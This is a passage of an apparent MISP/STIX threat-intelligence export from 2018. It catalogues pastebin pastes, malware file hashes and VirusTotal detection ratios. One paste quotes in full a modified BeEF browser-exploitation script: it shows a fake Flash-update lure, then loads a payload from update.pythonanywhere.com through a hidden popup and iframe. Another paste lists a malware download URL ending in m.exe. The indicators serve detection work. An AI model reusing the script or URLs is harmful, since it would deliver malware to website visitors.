"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d5ac-4dd0-4d93-b667-4d80950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d5ad-9e90-4225-99a2-4679950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/raw/Xu74Mzif",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d5ad-17d8-4d8b-8b63-4f23950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:52:26.000Z",
|
|
"modified": "2018-09-19T04:52:26.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
"value": "142.44.215.177\r\n144.217.61.147",
|
|
"category": "Other",
|
|
"uuid": "5ba1d60a-82f8-486e-99d5-4580950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d60b-7de0-4efe-bb0b-44ca950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d60b-8bb8-4e7a-a466-40fc950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/raw/rBHjTZY6",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d60b-8930-46d0-a00b-4dc6950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:54:11.000Z",
|
|
"modified": "2018-09-19T04:54:11.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
"value": "//\r\n// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net\r\n// Browser Exploitation Framework (BeEF) - http://beefproject.com\r\n// See the file 'doc/COPYING' for copying permission\r\n//\r\n\r\n // Module Configurations\r\nvar image = \"http://d20blzxlz9ydha.cloudfront.net/flash.png\";\r\nvar payload_type = \"Custom_Payload\";\r\nvar payload_uri = \"http://update.pythonanywhere.com/d\";\r\n\r\n//var beef_root = beef.net.httpproto + \"://\" + beef.net.host + \":\" + beef.net.port;\r\nvar payload = \"\";\r\n\r\n// Function to gray out the screen\r\nvar grayOut = function(vis, options) {\r\nvar options = options || {};\r\nvar zindex = options.zindex || 50;\r\nvar opacity = options.opacity || 70;\r\nvar opaque = (opacity / 100);\r\nvar bgcolor = options.bgcolor || '#000000';\r\nvar dark=document.getElementById('darkenScreenObject');\r\nif (!dark) {\r\n var tbody = document.getElementsByTagName(\"body\")[0];\r\n var tnode = document.createElement('div');\r\n tnode.style.position='absolute';\r\n tnode.style.top='0px';\r\n tnode.style.left='0px';\r\n tnode.style.overflow='hidden';\r\n tnode.style.display='none';\r\n tnode.id='darkenScreenObject';\r\n tbody.appendChild(tnode);\r\n dark=document.getElementById('darkenScreenObject');\r\n}\r\nif (vis) {\r\n var pageWidth='100%';\r\n var pageHeight='100%';\r\n dark.style.opacity=opaque;\r\n dark.style.MozOpacity=opaque;\r\n dark.style.filter='alpha(opacity='+opacity+')';\r\n dark.style.zIndex=zindex;\r\n dark.style.backgroundColor=bgcolor;\r\n dark.style.width= pageWidth;\r\n dark.style.height= pageHeight;\r\n dark.style.display='block';\r\n} else {\r\n dark.style.display='none';\r\n}\r\n};\r\n\r\n\r\n// Payload Configuration\r\nswitch (payload_type) {\r\n\tcase \"Custom_Payload\":\r\n\t payload = payload_uri;\r\n\tbreak;\r\n\tcase \"Firefox_Extension\":\r\n\t //payload = beef_root + \"/api/ipec/ff_extension\";\r\n\t break;\r\n\tdefault:\r\n\t //beef.net.send('<%= @command_url %>', <%= @command_id %>, 
'error=payload not selected');\r\n\t break;\r\n}\r\n\r\n// Create DIV\r\nvar flashdiv = document.createElement('div');\r\nflashdiv.setAttribute('id', 'flashDiv');\r\nflashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');\r\nflashdiv.setAttribute('align', 'center');\r\nvar id = setInterval(frame, 100);\r\nfunction frame() {\r\n\tif (document.body.appendChild(flashdiv)) {\r\n\t\t// window.open is very useful when using data URI vectors and the IFrame/Object tag\r\n\t\t// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.\r\n\t\tflashdiv.innerHTML = \"<a href=\\\"\" + payload + \"\\\" target=\\\"_blank\\\" ><img src=\\\"\" + image + \"\\\" /></a>\";\r\n\r\n\t\t// gray out the background\r\n\t\tgrayOut(true,{'opacity':'30'});\r\n\r\n\t\t// clean up on click\r\n\t\tdocument.getElementById(\"flashDiv\").onclick = function(){\r\n\t\t\tdocument.body.removeChild(flashdiv);\r\n\t\t\tgrayOut(false,{'opacity':'0'});\r\n\t\t\tdocument.body.removeChild(document.getElementById('darkenScreenObject'));\r\n\t\t\taa=window.open(\"http://dzebppteh32lz.cloudfront.net/c\",'popUpWindow','height=1,width=1,top=0,left=0,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=no')\r\n\t\t\t//aa=window.openwindow.open(\"http://d3lvemwrafj7a7.cloudfront.net/e\",'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=10, height=10', ''); \r\n\t\t\taa.moveTo(10000,10000);\r\n\t\t\t//window.open(\"http://update.pythonanywhere.com/d\");\r\n\t\t\tvar iframe = document.createElement('iframe');\r\n\t\t\tiframe.style.display = \"none\";\r\n\t\t\tiframe.src = \"http://update.pythonanywhere.com/d\";\r\n\t\t\tdocument.body.appendChild(iframe);\r\n\t\t\t\r\n\t\t}\r\n\t clearInterval(id);\r\n\t} \r\n}",
|
|
"category": "Other",
|
|
"uuid": "5ba1d673-8450-46fa-bc4e-4243950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d674-5500-4354-b426-4bad950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d674-e264-47fd-a089-449e950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/raw/AbhwC1Ki",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d674-f124-48c8-95ff-4bb8950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:55:42.000Z",
|
|
"modified": "2018-09-19T04:55:42.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
"value": "https://daknobcq4zal6vbm.tk/m.exe;",
|
|
"category": "Other",
|
|
"uuid": "5ba1d6ce-d1e4-4362-a7ac-27c3950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d6cf-498c-4df8-b61f-27c3950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d6cf-7928-4e3e-9e52-27c3950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/R5q9wvHw",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d6cf-6ac4-4e0e-a8e7-27c3950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:02.000Z",
|
|
"modified": "2018-09-19T05:21:02.000Z",
|
|
"pattern": "[file:hashes.MD5 = '33357485c5c92f087bd53602d6d8a48b' AND file:hashes.SHA1 = '7403a54aa5ff712a8614e6a90398322d5fa7ba89' AND file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:01.000Z",
|
|
"modified": "2018-09-19T05:21:01.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T19:28:42",
|
|
"category": "Other",
|
|
"uuid": "cbf68cfc-a53a-4a67-b043-d514ef6c251a"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d/analysis/1537298922/",
|
|
"category": "External analysis",
|
|
"uuid": "d17c47a6-5c9e-4b65-97a1-ecd5dd083c82"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "9/53",
|
|
"category": "Other",
|
|
"uuid": "6f915503-6a42-4a44-8ba4-a563bb038e7d"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:05.000Z",
|
|
"modified": "2018-09-19T05:21:05.000Z",
|
|
"pattern": "[file:hashes.MD5 = '1de7ceb3434243aa94296393165f89e7' AND file:hashes.SHA1 = '67a12afbe6751418141284716235a6b27c17443a' AND file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:03.000Z",
|
|
"modified": "2018-09-19T05:21:03.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T03:31:22",
|
|
"category": "Other",
|
|
"uuid": "a7862599-832b-4ba2-ab1c-b1a320c1a4ad"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054/analysis/1537327882/",
|
|
"category": "External analysis",
|
|
"uuid": "abcf84f8-0717-443f-b190-4c623df3933d"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "26/58",
|
|
"category": "Other",
|
|
"uuid": "c306e374-13a0-4f9e-956c-e55fe50a8c97"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:07.000Z",
|
|
"modified": "2018-09-19T05:21:07.000Z",
|
|
"pattern": "[file:hashes.MD5 = 'f8c7e23c71478aa99dc3627da989b2ca' AND file:hashes.SHA1 = 'e41d26b124c21b2c82b77194ed6be6ee8281410a' AND file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:05.000Z",
|
|
"modified": "2018-09-19T05:21:05.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T20:07:10",
|
|
"category": "Other",
|
|
"uuid": "f8ac3222-2b8a-49c6-b107-f22538e9f3f9"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54/analysis/1537301230/",
|
|
"category": "External analysis",
|
|
"uuid": "193bbd5f-b6bd-43bc-b1f7-f75586c795ad"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
"value": "10/58",
"category": "Other",
"uuid": "2240f3fb-744f-48a4-8918-f9c428c4d465"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:09.000Z",
"modified": "2018-09-19T05:21:09.000Z",
"pattern": "[file:hashes.MD5 = '9d080aa27da74e146a45b56c86476f20' AND file:hashes.SHA1 = '115bda02fd2807bd0e9645656c378bf1b145b4b8' AND file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:09Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:08.000Z",
"modified": "2018-09-19T05:21:08.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-18T11:41:09",
"category": "Other",
"uuid": "3d949d3f-cbed-49eb-b6d4-76efa21d3605"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff/analysis/1537270869/",
"category": "External analysis",
"uuid": "120a5e8e-d241-45d1-a52a-b20a69c69c21"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "21/58",
"category": "Other",
"uuid": "6522271c-6206-43b8-bed9-2ee6b928da31"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:12.000Z",
"modified": "2018-09-19T05:21:12.000Z",
"pattern": "[file:hashes.MD5 = '2d39b1792b263eba084e10c54e053d84' AND file:hashes.SHA1 = '1468eac59bd43901de82389276bded18202f799f' AND file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:12Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:10.000Z",
"modified": "2018-09-19T05:21:10.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-18T18:34:30",
"category": "Other",
"uuid": "9c2f0268-084d-401f-a118-859baa7da926"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc/analysis/1537295670/",
"category": "External analysis",
"uuid": "92b34d76-149f-4fab-a1c0-3d1fab052d39"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "15/58",
"category": "Other",
"uuid": "7c1e81fd-a762-4c8c-910f-e10d7da374bd"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:14.000Z",
"modified": "2018-09-19T05:21:14.000Z",
"pattern": "[file:hashes.MD5 = '7b5008d312465307905d96b4b8366326' AND file:hashes.SHA1 = 'a0a5d9fc4ce11f9069a64229cef52ba707027546' AND file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:14Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:12.000Z",
"modified": "2018-09-19T05:21:12.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-19T05:11:59",
"category": "Other",
"uuid": "344f34ab-206c-4ca6-857f-f038049eeca8"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641/analysis/1537333919/",
"category": "External analysis",
"uuid": "b42f45b5-2c58-4b38-a615-c6c66fd48dcb"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "10/58",
"category": "Other",
"uuid": "647a2027-5c6b-4ee2-a934-fe17edc10ae7"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:16.000Z",
"modified": "2018-09-19T05:21:16.000Z",
"pattern": "[file:hashes.MD5 = 'e158c98a90cc7b14d026443cbcd8b520' AND file:hashes.SHA1 = '0c00df2bee83f9f7c6f2be3d9dd7557e9410a579' AND file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:16Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:15.000Z",
"modified": "2018-09-19T05:21:15.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-18T18:31:13",
"category": "Other",
"uuid": "3eecf2ce-db49-433d-8296-a664cf52841e"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af/analysis/1537295473/",
"category": "External analysis",
"uuid": "5e7593ee-fbb7-411a-8578-ed90875953e3"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "14/58",
"category": "Other",
"uuid": "585e2605-9a59-4405-b604-1d36a87903e8"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:19.000Z",
"modified": "2018-09-19T05:21:19.000Z",
"pattern": "[file:hashes.MD5 = '3b5baecd61190e12a526c51d5ecccbbe' AND file:hashes.SHA1 = '422288eb6941cee899c1046ccfcd94681b36230a' AND file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:19Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:17.000Z",
"modified": "2018-09-19T05:21:17.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-19T03:31:11",
"category": "Other",
"uuid": "f817657f-fa64-46b2-83d0-5baddd55e755"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8/analysis/1537327871/",
"category": "External analysis",
"uuid": "8e6ad2e0-623d-4a80-a8d1-9fd46979f486"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "10/58",
"category": "Other",
"uuid": "1605e2ae-c2cb-4ec7-83b8-eae5be80768c"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:21.000Z",
"modified": "2018-09-19T05:21:21.000Z",
"pattern": "[file:hashes.MD5 = '50ab7c696ca74e8ae322855d445e0613' AND file:hashes.SHA1 = 'b8b0226fb4f945b68d222c62ebb02f00874f379c' AND file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:19.000Z",
"modified": "2018-09-19T05:21:19.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-18T10:58:17",
"category": "Other",
"uuid": "9229de7c-a78d-4c5e-9a03-a80669988b10"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d/analysis/1537268297/",
"category": "External analysis",
"uuid": "69b5bea2-6731-4815-a928-fee550c759e4"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "20/58",
"category": "Other",
"uuid": "e36c477b-83aa-479a-ab23-212692965f2e"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:23.000Z",
"modified": "2018-09-19T05:21:23.000Z",
"pattern": "[file:hashes.MD5 = '56303f9c9b3ec89f4a883a4d7b079f65' AND file:hashes.SHA1 = '4f0d4dc8cf49e2deff34e00e362bbc81dbef1f8d' AND file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:23Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:22.000Z",
"modified": "2018-09-19T05:21:22.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-19T05:10:00",
"category": "Other",
"uuid": "e412a478-b0ac-46aa-af48-a19eb9484d6e"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa/analysis/1537333800/",
"category": "External analysis",
"uuid": "7149939a-1c5a-4b67-8ae0-edd23d9c4473"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "12/58",
"category": "Other",
"uuid": "c5156a8e-63da-4dca-af17-fe34c7991169"
}
],
